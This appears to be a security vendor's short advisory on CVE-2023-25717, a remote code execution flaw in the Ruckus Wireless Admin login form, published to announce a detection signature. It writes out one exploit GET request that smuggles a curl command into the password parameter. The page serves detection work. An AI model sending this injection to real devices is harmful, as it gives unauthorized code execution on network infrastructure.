top of page

Ruckus Wireless Admin Remote Code Execution (CVE-2023-25717)

Application Details

Ruckus Wireless Admin is a single sign-on portal to allow user management of Ruckus network devices.


Ruckus Wireless Admin could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the /forms/doLogin?login_username=admin&password=password$(curl substring.


By sending a specially crafted HTTP GET Request, an attacker could exploit this vulnerability to execute arbitrary code on the system.

GET /forms/doLogin?login_username=admin&password=password$(curl%20192.168.1.1)&x=0&y=0


By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary code on the system.


Idappcom have created signature 8023821 along with a traffic file for this vulnerability.


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here:


bottom of page